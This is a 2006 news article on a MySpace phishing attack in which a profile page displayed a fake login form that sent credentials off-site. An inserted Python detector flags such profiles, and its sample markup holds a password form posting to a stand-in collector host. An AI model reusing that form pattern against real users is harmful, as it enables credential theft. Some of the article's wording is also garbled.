
A New Phishing Attack on MySpace

Network security provider Netcraft warns that MySpace has fallen victim to a phishing scam of a kind that did not exist earlier. Attackers trick users into revealing their passwords through an authentic MySpace account.

On Thursday, October 26, 2006, Netcraft (netcraft.com), which specializes in analyzing websites, discovered that hackers had taken command of MySpace (myspace.com), a social networking site, by offering a hoax login form on the main site. The login form dupes the victim into submitting his/her username and password to a distant server in France.

Netcraft has since alerted MySpace to the situation. The fraudulent login page appears real because it is hosted on MySpace's own servers and gives no sign of external content, such as cross-site scripting or open redirects. Consequently, the attack can trap even those users who keep their security updates current.

The attack runs from a profile page with the username 'login_home_index_html' and uses custom-coded HTML to conceal the actual MySpace content, displaying the modified login form in its place. Once a user account is compromised through this process, accessing its personal information becomes simple.

The attack is unusual because it does not use suspicious techniques such as cross-site scripting to deceive users. This implies that the automated tools MySpace employs to search for malicious content may not provide the telltale clues.
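A server-side check for the pattern described above, as an added example that is not part of the original article or of MySpace's tooling: it flags user-supplied profile HTML that contains a password form, and usernames that imitate a page name. The first-party host list, the username heuristic, the function names and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = {"myspace.com", "www.myspace.com"}  # assumption: first-party hosts
# Heuristic (assumption): username tokens that make a profile URL look like a site page.
PAGE_LIKE = re.compile(r"(^|_)(login|signin|index|home|html?)(_|$)", re.I)

class FormCollector(HTMLParser):
    """Collects forms in user-supplied HTML that contain a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._flush()
            self._cur = {"action": (a.get("action") or "").strip(), "pw": False}
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._cur is None:  # password field outside any <form>
                self._cur = {"action": "", "pw": False}
            self._cur["pw"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()
    def _flush(self):
        if self._cur and self._cur["pw"]:
            self.forms.append(self._cur)
        self._cur = None
    def close(self):  # also record a form the markup never closed
        super().close()
        self._flush()

def review_profile(username, profile_html):
    """Return the reasons a profile should be queued for manual review."""
    reasons = []
    if PAGE_LIKE.search(username):
        reasons.append("username imitates a site page name")
    parser = FormCollector()
    parser.feed(profile_html)
    parser.close()
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        where = "off-site host " + host if host and host not in FIRST_PARTY else "this site"
        reasons.append("password form in user content posts to " + where)
    return reasons

# Constructed sample profile markup, not taken from the real attack page.
SAMPLE = ('<div style="position:absolute;top:0"><form method="post" '
          'action="http://collector.example.invalid/save">'
          '<input name="email"><input type="password" name="pw"></form></div>')
```

Any password field inside user-generated content is reported, including one that posts back to the site itself, because a profile page has no legitimate reason to collect credentials.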

Because MySpace is a social networking site, its profiles have nothing to do with credit card numbers or bank accounts; however, they can be a means of spreading malware or of designing even more skilled phishing attacks in the future.

According to Netcraft analyst Rich Miller, on October 27, 2006, 'Pacific' exploited the way MySpace arranges URLs to give the false login page an authentic-looking web address. This scheme could baffle even the more security-savvy users.

The attack is new, which indicates another malicious method that phishers are using to fool people into divulging their account details. Sites like MySpace characteristically contain databases of unlimited usernames. Users who are not sure whether they are on the right login page should go to the main address, said a News Corp. spokesperson.


» SPAMfighter News - 11/1/2006
